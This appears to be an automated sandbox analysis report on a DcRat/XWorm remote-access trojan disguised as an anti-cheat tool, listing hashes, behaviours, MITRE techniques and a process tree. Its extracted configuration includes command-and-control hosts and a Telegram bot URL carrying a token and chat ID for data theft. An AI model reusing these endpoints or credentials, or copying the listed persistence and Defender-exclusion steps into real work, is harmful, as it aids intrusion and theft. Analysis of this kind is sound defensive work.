dcrat | 098a170344a4ca7efe3e0c8b48c25a64fe0570b68eb0f3032c229e81597c1fbc

Analysis

max time kernel
147s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
27-07-2024 08:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

EasyAnti-CheatAnalyzer.exe
Size

2.6MB
MD5

6f4697ceaa48de87c8463be064a41834
SHA1

129b599295e013389255c16126ae64afd42c9cb4
SHA256

098a170344a4ca7efe3e0c8b48c25a64fe0570b68eb0f3032c229e81597c1fbc
SHA512

b9ff325866976ab0270224f3b512c45b8c5442fb58eff0b883fdf54babfa4845f95eb01d7c6f73d73e08fd59fd0c21d039bd75c318bb30e843c2bef861267c40
SSDEEP

49152:lQQovM4NUTzrWlUMtHE772hZD9gtGIOSzAYpk8xKFxNWMjZuW:lgM4NOYt0iK8IOScYpP8WcD

Score

10^/10

dcrat xworm discovery evasion execution infostealer persistence rat trojan

Malware Config

Extracted

Family

xworm

main-although.gl.at.ply.gg:30970

article-coal.gl.at.ply.gg:27263

Attributes

Install_directory
%AppData%
install_file
XClient.exe
telegram
https://api.telegram.org/bot7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs/sendMessage?chat_id=6131620354

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Xworm Payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Windows Driver Foundation.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\svchost.exe	family_xworm
behavioral2/memory/4116-37-0x0000000000890000-0x00000000008A8000-memory.dmp	family_xworm
behavioral2/memory/872-36-0x00000000000A0000-0x00000000000BA000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe	dcrat
C:\SurrogatewinDrivernetsvc\portproviderperf.exe	dcrat
behavioral2/memory/2548-144-0x0000000000E30000-0x00000000010E6000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3780	powershell.exe
1572	powershell.exe
4340	powershell.exe
3536	powershell.exe
3320	powershell.exe
4652	powershell.exe
2952	powershell.exe
3632	powershell.exe

Disables Task Manager via registry modification
evasion

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Runtime Broker.exesvchost.exeWindows Driver Foundation.exeWScript.exeEasyAnti-CheatAnalyzer.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation	Runtime Broker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation	Windows Driver Foundation.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation	EasyAnti-CheatAnalyzer.exe

Drops startup file 4 IoCs

Processes:

Windows Driver Foundation.exesvchost.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	Windows Driver Foundation.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	Windows Driver Foundation.exe

Executes dropped EXE 7 IoCs

Processes:

Runtime Broker.exeWindows Driver Foundation.exesvchost.exeportproviderperf.exesvchost.exesvchost.exesvchost.exe

pid process

3236 Runtime Broker.exe
4116 Windows Driver Foundation.exe
872 svchost.exe
2548 portproviderperf.exe
2160 svchost.exe
2872 svchost.exe
1544 svchost.exe

pid	process
3236	Runtime Broker.exe
4116	Windows Driver Foundation.exe
872	svchost.exe
2548	portproviderperf.exe
2160	svchost.exe
2872	svchost.exe
1544	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

svchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Public\\svchost.exe"	svchost.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

19 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
19	ip-api.com

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

Runtime Broker.exeWScript.execmd.exereg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Runtime Broker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
4044	PING.EXE
2676	PING.EXE
232	PING.EXE
4348	PING.EXE
4624	PING.EXE
5032	PING.EXE
4524	PING.EXE
4364	PING.EXE
2620	PING.EXE
2408	PING.EXE
3936	PING.EXE
2924	PING.EXE
4620	PING.EXE
4524	PING.EXE
3308	PING.EXE
4980	PING.EXE
4380	PING.EXE
2880	PING.EXE
4124	PING.EXE
2536	PING.EXE
2788	PING.EXE
2676	PING.EXE
4396	PING.EXE
1000	PING.EXE
512	PING.EXE
4260	PING.EXE
1192	PING.EXE
4340	PING.EXE
1292	PING.EXE
3668	PING.EXE
3264	PING.EXE
968	PING.EXE
3964	PING.EXE
5088	PING.EXE
3544	PING.EXE
2348	PING.EXE
2592	PING.EXE
2472	PING.EXE
5116	PING.EXE
4172	PING.EXE
1948	PING.EXE
4252	PING.EXE
3684	PING.EXE
3632	PING.EXE
3280	PING.EXE
3936	PING.EXE
4396	PING.EXE
3504	PING.EXE
3024	PING.EXE
3504	PING.EXE
2336	PING.EXE
2616	PING.EXE
1352	PING.EXE
2856	PING.EXE
2364	PING.EXE
1232	PING.EXE
2876	PING.EXE
212	PING.EXE
1008	PING.EXE
4396	PING.EXE
2112	PING.EXE
3456	PING.EXE
5028	PING.EXE
3996	PING.EXE

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3416 timeout.exe
Modifies registry class 1 IoCs

Processes:

Runtime Broker.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings Runtime Broker.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1636 reg.exe

pid	process
3416	timeout.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings	Runtime Broker.exe

pid	process
1636	reg.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

Processes:

pid	process
3416	PING.EXE
3936	PING.EXE
968	PING.EXE
5028	PING.EXE
2924	PING.EXE
4624	PING.EXE
3372	PING.EXE
3544	PING.EXE
2348	PING.EXE
2924	PING.EXE
4336	PING.EXE
1192	PING.EXE
968	PING.EXE
4664	PING.EXE
3280	PING.EXE
3936	PING.EXE
4620	PING.EXE
2880	PING.EXE
2336	PING.EXE
4572	PING.EXE
4044	PING.EXE
4252	PING.EXE
4348	PING.EXE
2616	PING.EXE
4524	PING.EXE
5116	PING.EXE
3936	PING.EXE
3640	PING.EXE
5012	PING.EXE
4524	PING.EXE
3156	PING.EXE
2620	PING.EXE
3684	PING.EXE
3964	PING.EXE
4364	PING.EXE
224	PING.EXE
4952	PING.EXE
4580	PING.EXE
5088	PING.EXE
2676	PING.EXE
4380	PING.EXE
2408	PING.EXE
2536	PING.EXE
1000	PING.EXE
2876	PING.EXE
3308	PING.EXE
916	PING.EXE
4952	PING.EXE
3632	PING.EXE
916	PING.EXE
1680	PING.EXE
3504	PING.EXE
4636	PING.EXE
2788	PING.EXE
5012	PING.EXE
2676	PING.EXE
2592	PING.EXE
2632	PING.EXE
3264	PING.EXE
2472	PING.EXE
4980	PING.EXE
4276	PING.EXE
1292	PING.EXE
3544	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

2732 schtasks.exe

pid	process
2732	schtasks.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exe

pid	process
2952	powershell.exe
2952	powershell.exe
4652	powershell.exe
4652	powershell.exe
4652	powershell.exe
2952	powershell.exe
3780	powershell.exe
3780	powershell.exe
3632	powershell.exe
3632	powershell.exe
3780	powershell.exe
3632	powershell.exe
1572	powershell.exe
1572	powershell.exe
4340	powershell.exe
4340	powershell.exe
1572	powershell.exe
4340	powershell.exe
3536	powershell.exe
3536	powershell.exe
3320	powershell.exe
3320	powershell.exe
3536	powershell.exe
3320	powershell.exe
872	svchost.exe
872	svchost.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

Windows Driver Foundation.exesvchost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeportproviderperf.exesvchost.exesvchost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	4116	Windows Driver Foundation.exe
Token: SeDebugPrivilege	872	svchost.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	4652	powershell.exe
Token: SeDebugPrivilege	3780	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	4340	powershell.exe
Token: SeDebugPrivilege	1572	powershell.exe
Token: SeDebugPrivilege	3320	powershell.exe
Token: SeDebugPrivilege	3536	powershell.exe
Token: SeDebugPrivilege	2548	portproviderperf.exe
Token: SeDebugPrivilege	4116	Windows Driver Foundation.exe
Token: SeDebugPrivilege	872	svchost.exe
Token: SeDebugPrivilege	2160	svchost.exe
Token: SeDebugPrivilege	2872	svchost.exe
Token: SeDebugPrivilege	1544	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

svchost.exe

pid process

872 svchost.exe

pid	process
872	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

EasyAnti-CheatAnalyzer.execmd.exeRuntime Broker.exesvchost.exeWindows Driver Foundation.exeWScript.execmd.exe

description	pid	process	target process
PID 1356 wrote to memory of 4632	1356	EasyAnti-CheatAnalyzer.exe	cmd.exe
PID 1356 wrote to memory of 4632	1356	EasyAnti-CheatAnalyzer.exe	cmd.exe
PID 1356 wrote to memory of 3236	1356	EasyAnti-CheatAnalyzer.exe	Runtime Broker.exe
PID 1356 wrote to memory of 3236	1356	EasyAnti-CheatAnalyzer.exe	Runtime Broker.exe
PID 1356 wrote to memory of 3236	1356	EasyAnti-CheatAnalyzer.exe	Runtime Broker.exe
PID 1356 wrote to memory of 4116	1356	EasyAnti-CheatAnalyzer.exe	Windows Driver Foundation.exe
PID 1356 wrote to memory of 4116	1356	EasyAnti-CheatAnalyzer.exe	Windows Driver Foundation.exe
PID 1356 wrote to memory of 872	1356	EasyAnti-CheatAnalyzer.exe	svchost.exe
PID 1356 wrote to memory of 872	1356	EasyAnti-CheatAnalyzer.exe	svchost.exe
PID 4632 wrote to memory of 3416	4632	cmd.exe	timeout.exe
PID 4632 wrote to memory of 3416	4632	cmd.exe	timeout.exe
PID 3236 wrote to memory of 3020	3236	Runtime Broker.exe	WScript.exe
PID 3236 wrote to memory of 3020	3236	Runtime Broker.exe	WScript.exe
PID 3236 wrote to memory of 3020	3236	Runtime Broker.exe	WScript.exe
PID 4632 wrote to memory of 1500	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 1500	4632	cmd.exe	PING.EXE
PID 872 wrote to memory of 4652	872	svchost.exe	powershell.exe
PID 872 wrote to memory of 4652	872	svchost.exe	powershell.exe
PID 4116 wrote to memory of 2952	4116	Windows Driver Foundation.exe	powershell.exe
PID 4116 wrote to memory of 2952	4116	Windows Driver Foundation.exe	powershell.exe
PID 4116 wrote to memory of 3780	4116	Windows Driver Foundation.exe	powershell.exe
PID 4116 wrote to memory of 3780	4116	Windows Driver Foundation.exe	powershell.exe
PID 872 wrote to memory of 3632	872	svchost.exe	powershell.exe
PID 872 wrote to memory of 3632	872	svchost.exe	powershell.exe
PID 4632 wrote to memory of 212	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 212	4632	cmd.exe	PING.EXE
PID 3020 wrote to memory of 3512	3020	WScript.exe	cmd.exe
PID 3020 wrote to memory of 3512	3020	WScript.exe	cmd.exe
PID 3020 wrote to memory of 3512	3020	WScript.exe	cmd.exe
PID 4116 wrote to memory of 1572	4116	Windows Driver Foundation.exe	powershell.exe
PID 4116 wrote to memory of 1572	4116	Windows Driver Foundation.exe	powershell.exe
PID 872 wrote to memory of 4340	872	svchost.exe	powershell.exe
PID 872 wrote to memory of 4340	872	svchost.exe	powershell.exe
PID 4116 wrote to memory of 3536	4116	Windows Driver Foundation.exe	powershell.exe
PID 4116 wrote to memory of 3536	4116	Windows Driver Foundation.exe	powershell.exe
PID 872 wrote to memory of 3320	872	svchost.exe	powershell.exe
PID 872 wrote to memory of 3320	872	svchost.exe	powershell.exe
PID 4632 wrote to memory of 3936	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 3936	4632	cmd.exe	PING.EXE
PID 3512 wrote to memory of 2548	3512	cmd.exe	portproviderperf.exe
PID 3512 wrote to memory of 2548	3512	cmd.exe	portproviderperf.exe
PID 4632 wrote to memory of 4620	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 4620	4632	cmd.exe	PING.EXE
PID 872 wrote to memory of 2732	872	svchost.exe	schtasks.exe
PID 872 wrote to memory of 2732	872	svchost.exe	schtasks.exe
PID 3512 wrote to memory of 1636	3512	cmd.exe	reg.exe
PID 3512 wrote to memory of 1636	3512	cmd.exe	reg.exe
PID 3512 wrote to memory of 1636	3512	cmd.exe	reg.exe
PID 4632 wrote to memory of 772	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 772	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 2472	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 2472	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 4524	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 4524	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 4252	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 4252	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 3416	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 3416	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 5116	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 5116	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 4952	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 4952	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 968	4632	cmd.exe	PING.EXE
PID 4632 wrote to memory of 968	4632	cmd.exe	PING.EXE

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\EasyAnti-CheatAnalyzer.exe
"C:\Users\Admin\AppData\Local\Temp\EasyAnti-CheatAnalyzer.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EasyAntiCheat.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:4632

C:\Windows\system32\timeout.exe
timeout /t 3 /nobreak
3⤵
- Delays execution with timeout.exe
PID:3416

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
PID:1500

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:212

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3936

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4620

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
PID:772

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2472

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4524

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4252

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:3416

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5116

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:4952

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:968

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
PID:2592

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:232

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3684

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1232

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4396

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:4336

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3504

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
PID:4328

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3456

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:3936

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2880

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5028

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1192

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:4580

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4980

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3632

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1000

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4524

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
PID:4600

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1948

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3964

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
PID:4852

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4172

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5088

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4364

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:968

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2592

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:2632

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2876

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4348

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2336

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:3156

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:916

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:2676

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2924

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:4572

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3668

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:224

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:512

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:1680

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1008

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4124

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:4276

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3308

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4340

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2620

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
PID:2432

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3280

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4624

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:4664

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
PID:5116

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4380

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:3372

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2408

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2616

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2536

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4044

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
PID:3836

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
PID:3492

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4396

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3544

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3504

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:4636

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2364

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2676

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:5012

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3936

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
PID:4728

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4260

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2348

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2856

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2788

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5032

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3024

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3264

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1292

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
PID:4384

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1352

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3996

